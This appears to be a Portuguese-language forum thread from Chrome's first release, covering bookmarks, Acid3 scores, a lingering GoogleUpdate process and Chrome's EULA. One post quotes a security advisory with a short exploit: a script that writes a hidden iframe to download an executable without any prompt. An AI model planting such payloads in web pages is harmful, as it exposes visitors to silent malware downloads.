Jump to content

Google Chrome


hda
 Share

Recommended Posts

Se meterem alguns plugins do firefox eu mudo

É uma questão de tempo.

Eu ainda não o experimentei, porque no PC que estou a usar não tem o SP2 e não me está a apetecer instalar. Mas quando o meu PC habitual estiver operacional, testo aí o bicho! :-..

Link to comment
Share on other sites

- mouse gestures

- sincronização de bookmarks, etc com um server

- quick dial decente (podermos escolher os sites que estão na lista e não os mais usados)

pelo menos isto tem que ter para eu pensar em mudar

Link to comment
Share on other sites

Aonde e que esta o folder das bookmarks?? :unsure:

Do lado direito, na barra dos bookmarks (penso que é isso que queres).

Em PT é "Outros marcadores".

Tenho a dizer que adoro o browser.

Só não curto a cena de quando se selecciona texto o gajo selecciona o div/td/whatever que contem esse texto, em vez de simplesmente seleccionar o texto. É apenas um pormenor, mas não gosto.

Link to comment
Share on other sites

Acho que este browser num futuro muito proximo, vai ter um grande numero de adpetos.

Aonde e que esta o folder das bookmarks?? :unsure:

O Import e feito incorrectamente.

Tens de activar a barra de marcadores.

Os favoritos estão em "Outros marcadores" mas podes arrastá-los para a barra de marcadores.

Link to comment
Share on other sites

Hummm, ate ai tambem eu cheguei, eu quero e saber a sua localizacao no disco, i.e, por exemplo o IE esta em bla bla bla\Favorites e do Chrome aonde e que esta o bookmark.htm??? :unsure:

Para assim corrigir os bookmarks, o load das paginas e mesmo muito rapido, eu tenho proxy cache e ja com o IE e bastante rapido.

Mas tem uma coisa que eu nao gosto nos outros browsers Firefox e Opera, o interface, aguarda-se e mais funcionalidades de configuracao do browser em si, nem sei aonde e que estao os bookmarks, nem os ficheiros temporarios... <_<

Chorme HTTP/USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

Por causa disto e que a Microsoft esta a lancar o IE8, cheio de extras...

snap.gif

:stars:

Edited by alex3299
Link to comment
Share on other sites

É engraçado ver páginas cheias de defeitos! Tem demasiados problemas este browser.

Quem anda no mundo da implementação de páginas de net tem mais uma dor de cabeça!

Cheira-me que quando o browser tiver uns mesitos de vida, vai-se inverter a coisa...

Link to comment
Share on other sites

É engraçado ver páginas cheias de defeitos! Tem demasiados problemas este browser.

Quem anda no mundo da implementação de páginas de net tem mais uma dor de cabeça!

só existem dores de cabeça porque nem todos os browsers seguem os standards. depois andam os developers a fazer hacks para css funcionarem no IE, clears porque certo browser não os faz onde devem estar, etc.

Link to comment
Share on other sites

Passei-me com esta falha de segurança!!! Eu não experimentei, ainda, o browser, mas...

Como é que é possível, nos dias de hoje, com uma empresa como a Google, isto passar em claro:

Google Chrome Browser Automatic File Download

------------------------------------------------------------------------

SUMMARY

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.

DETAILS

Exploit:

<script>

document.write('<iframe src="http://www.example.com/hello.exe"

frameborder="0" width="0" height="0">'); </script>

Link to comment
Share on other sites

firefox desde 2004! <_<

li á pouco o teste acid3, testes a browsers nota de 0 a 100.

IE8 beta 2: 22/100

Google Chrome:77/100

Firefox 3.1 Beta 1: 85/100

Opera 9.60: 91/100

Safari 4: 100/100

Edited by D14M4NT
Link to comment
Share on other sites

É engraçado ver páginas cheias de defeitos! Tem demasiados problemas este browser.

Quem anda no mundo da implementação de páginas de net tem mais uma dor de cabeça!

só existem dores de cabeça porque nem todos os browsers seguem os standards. depois andam os developers a fazer hacks para css funcionarem no IE, clears porque certo browser não os faz onde devem estar, etc.

Exactamente isso que me estava a referir... é um martírio ter de andar a testar as cenas em 3/4 browsers diferentes... e depois para corrigir o problema... lol

Link to comment
Share on other sites

O gestor de tarefas é muito bem conseguido. Dar tempo ao tempo, porque parece-me que tem pernas para andar, e são grandes. :-..

Desinstalei o chrome e agora tenho aqui um processo chamado GoogleUpdate.exe sempre a aparecer .... mesmo depois de morto.... google you suck!!!

1º Run > Msconfig > Services / Startup e unchecka esse processo.

Depois vê se consegues desinstalar isso.

Link to comment
Share on other sites

Google vai alterar EULA do Chrome

A licença de utilização do novo browser da Google é considerado abusiva e vai ser corrigida. A nova versão vai ser retroactiva.

A indignação correu pela Internet. O acordo de utilização do novo browser da Google dava à empresa o direito de usar como bem entendesse todos os conteúdos pessoais que fossem disponibilizados através dos “serviços” da Google.

Por “Serviços”, o acordo entendia o browser e quaisquer outras páginas ou programas.

A empresa, noticia o Ars Technica, vai rever e alterar este acordo.

Fonte: Exame Informática

Link to comment
Share on other sites

Google vai alterar EULA do Chrome

A licença de utilização do novo browser da Google é considerado abusiva e vai ser corrigida. A nova versão vai ser retroactiva.

A indignação correu pela Internet. O acordo de utilização do novo browser da Google dava à empresa o direito de usar como bem entendesse todos os conteúdos pessoais que fossem disponibilizados através dos “serviços” da Google.

Por “Serviços”, o acordo entendia o browser e quaisquer outras páginas ou programas.

A empresa, noticia o Ars Technica, vai rever e alterar este acordo.

Fonte: Exame Informática

afinal alguem sempre lê as letrinhas que nunca ninguem lê

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.